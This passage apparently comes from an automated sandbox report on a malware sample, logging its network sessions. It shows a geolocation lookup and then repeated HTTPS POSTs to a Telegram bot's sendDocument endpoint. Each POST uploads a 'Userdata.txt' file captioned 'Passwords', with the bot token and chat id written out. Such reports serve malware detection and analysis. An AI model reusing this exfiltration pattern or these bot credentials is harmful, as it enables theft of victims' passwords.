2025-01-11 06:23:57 UTC	1390	IN	Data Raw: fe bd 62 22 d1 b1 dc 65 42 32 f2 45 32 e2 c8 c8 d0 ec 48 6a f3 d8 95 98 fd 8c a3 58 b7 6d e5 aa bc 2b 9a a8 33 28 19 2e 7e 8d 6b ec 44 4a 11 dd 07 2c 50 e3 2e 5a 74 19 5d 71 15 2f fd c1 81 40 0c d7 e4 30 65 5b 50 6b 95 81 72 95 47 41 9a e5 8b 4c 85 af 97 3e 29 a1 e5 ca 1c 97 36 8a d8 c3 49 61 eb 26 bb 08 e6 52 d3 18 86 5f 66 98 b7 f7 f3 14 92 9a 82 47 00 ad 04 fd b3 85 97 04 a3 90 31 dc 2b cd 41 18 fd 35 c2 81 6b b4 4e 90 82 59 57 fb 71 8a 6d fc ba 98 66 a8 6a 6c f4 18 d4 e3 e7 39 63 d1 72 3e 7c 8d 05 36 06 fe fa b8 52 07 05 1f 56 e2 35 34 3d ad b0 81 36 d3 6e d1 ec 53 d2 48 c5 ff 57 a3 7f a3 3e 40 4b 9a 2f 7e bc 1a be 85 01 d0 5c 33 1e 5e d1 0a 19 08 1f 9a 1c 3d e5 ae e3 33 b2 44 ae db 6f 86 cf 00 85 18 e6 15 60 50 2e 8f 3f 0d 89 8e ff 38 51 b7 d6 a6 e5 Data Ascii: b"eB2E2HjXm+3(.~kDJ,P.Zt]q/@0e[PkrGAL>)6Ia&R_fG1+A5kNYWqmfjl9cr>\|6RV54=6nSHW>@K/~\3^=3Do`P.?8Q
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: 2a 0f e8 40 d6 ba 78 89 5e dc 85 6e 0c 95 94 d2 7f e7 14 24 6a 3d 1f fc a6 5d fe ab 52 50 a4 c1 a0 15 8c 5f 2e 80 f3 03 eb de 19 41 5e a3 97 b1 8f 93 0b e4 8a 7d 38 63 7f b3 6e 6d ee 34 d7 f3 bc 6b bb 6d 8d fe 05 78 83 4e af ae b6 ec ea 73 26 eb ec 78 c8 87 15 12 9d 4f 35 76 16 72 54 06 09 d4 db 75 d6 98 07 11 0f 3c 67 81 b4 24 65 5e a3 91 80 61 8a fa 05 f9 23 5a e8 65 be 41 2a bd 01 6d 50 9d 93 fa 20 1b 70 ca a0 90 ba f0 88 71 d2 30 22 c2 44 63 ef ec 27 68 ab 69 31 7e f1 88 07 75 b6 96 b0 98 27 56 45 9d 79 f1 10 d1 b9 89 be 82 3b dc 4a 1c d3 9d 8f c4 cf a1 10 22 e1 59 75 4a 71 8b ce ba 5b a4 77 07 5d 13 82 07 2a bc af a8 86 85 49 cf 66 85 8d 9b ac 3e 8d 5d 3d 24 a7 3b 37 ea 00 eb 78 37 45 c0 44 80 fb 4a 34 50 fd 9f a8 42 b9 84 96 7f da 08 bb db 01 75 a3 Data Ascii: @x^n$j=]RP_.A^}8cnm4kmxNs&xO5vrTu<g$e^a#ZeAmP pq0"Dc'hi1~u'VEy;J"YuJq[w]*If>]=$;7x7EDJ4PBu
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: 40 5b 4b 08 52 00 02 33 ee 0e 34 14 7e 92 02 4f 0b 19 43 95 38 ac e1 25 c1 8b 11 ce 94 45 cb 9c 85 ac dd 7c 3f f7 b7 cb 6c 5a 57 3a 24 b7 9f a0 93 f1 1b 7a c6 fa aa 53 49 c3 48 a8 7d e5 36 63 1b 52 8d c6 69 12 9f 30 62 cf 8d 39 9e 30 f3 95 89 fe 07 30 d4 5e e5 a1 79 26 85 9b ab 37 28 b4 c4 b3 33 5e 79 39 e3 0b a2 d1 5c 86 44 3b ea ef 11 17 4e a5 75 24 47 73 bc 0e a1 28 d7 a2 53 9b 34 63 8c 8e 9d 0c f3 ea 66 bc 6d 00 43 03 4a 2a ec d3 a5 71 3a f7 72 3b 6c cd b6 f8 23 54 2d 7d 51 5a 3f 08 1f 1d 5b dc 1d 4b da a7 1f 12 30 37 23 c4 50 b4 31 7d fe 20 01 73 a2 76 47 a9 3b 4b 1a f3 20 fe 27 f1 92 02 19 63 48 52 b4 c0 b5 e5 a2 dd 61 b2 f4 9c d9 da 9e db 38 c0 b2 97 32 a6 10 79 92 fd bd f8 d0 0d 18 a6 e4 c8 22 57 02 47 42 0e 66 fd 0e 02 79 e0 58 cf de 1b 1d 2c ff Data Ascii: @[KR34~OC8%E\|?lZW:$zSIH}6cRi0b900^y&7(3^y9\D;Nu$Gs(S4cfmCJ*q:r;l#T-}QZ?[K07#P1} svG;K 'cHRa82y"WGBfyX,
2025-01-11 06:23:57 UTC	1390	IN	Data Raw: 6a 2a 77 68 d3 37 4f 56 ac 39 a6 d5 60 e7 64 7a 83 f4 d5 38 0f 74 09 e7 19 4a 03 dc 11 b6 1e bf e1 39 60 e7 9d 75 a3 62 e4 cd 45 81 a8 25 dc f9 21 5b ed 8d 20 e6 b1 f3 b7 c2 fd 52 ee 35 bd 4d a3 50 f0 86 b5 3d fe 72 81 e5 c8 cc 80 9e a8 3f e2 05 b8 4f bf 5e c5 ba 8f e1 94 2f a2 b3 af 86 3f 02 c8 3b 03 8c dc f0 20 00 ed be 15 78 4e 48 3c 2c 81 06 c5 5f f8 d3 42 54 ba 4b d8 0c d3 ed b0 ac b1 19 c5 36 26 2d e6 92 52 cf 95 a0 d0 10 03 c8 0d 1d a6 6f 73 0b 5c e9 51 ac f8 82 fb d5 d2 f9 da e2 8c 3f c3 9c ac 88 5b de f6 1f d1 2e 22 9e c4 21 69 49 55 1c 64 73 59 5e 13 8d 37 cd 93 35 e8 43 e9 1c f6 4b ee e7 ec fb a2 61 4b cd 6a 26 fb ee 59 39 e0 49 84 2d 5a bb 98 55 bd f9 a0 4f 8b 5a 8c 51 62 50 1e 4b e3 2f 3a 3f 8b f4 a5 60 93 b2 2d 10 a9 e3 8f c4 0d 52 e5 21 28 Data Ascii: j*wh7OV9`dz8tJ9`ubE%![ R5MP=r?O^/?; xNH<,_BTK6&-Ros\Q?[."!iIUdsY^75CKaKj&Y9I-ZUOZQbPK/:?`-R!(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49765	104.21.96.1	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 06:24:01 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 06:24:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1891430 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWPlouuF7kChWfJzMOjhxdMSVSPxm7EaVg73jym4mD9RHxy1VbMAd6SgGKwOS71NrxPZZ1Xqzo%2BjxGpI1ipft9P%2B3DMNGydomB5ch4%2FZ9k9HEXJ217SERs%2FAxg2izbIBrjNIifnW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9002d2491b01de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=614&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1760096&cwnd=209&unsent_bytes=0&cid=506bbbd105078b28&ts=149&x=0"
2025-01-11 06:24:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49810	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:08 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31dea4934fa5 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:08 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 61 34 39 33 34 66 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31dea4934fa5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:08 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:08 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43761,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576648,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49822	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:09 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31f39219a5f5 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:09 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 33 39 32 31 39 61 35 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31f39219a5f5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:10 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:10 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43762,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576650,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49832	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:11 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd320870af382e Host: api.telegram.org Content-Length: 1090
2025-01-11 06:24:11 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 38 37 30 61 66 33 38 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd320870af382eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:11 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:11 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43763,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576651,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49844	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:13 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd321d4072b991 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:13 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 64 34 30 37 32 62 39 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd321d4072b991Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:13 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:13 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43764,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576653,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49856	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:14 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32309fc74a6b Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:14 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 30 39 66 63 37 34 61 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32309fc74a6bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:14 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:14 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43765,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576654,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49868	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:16 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3242917a2401 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
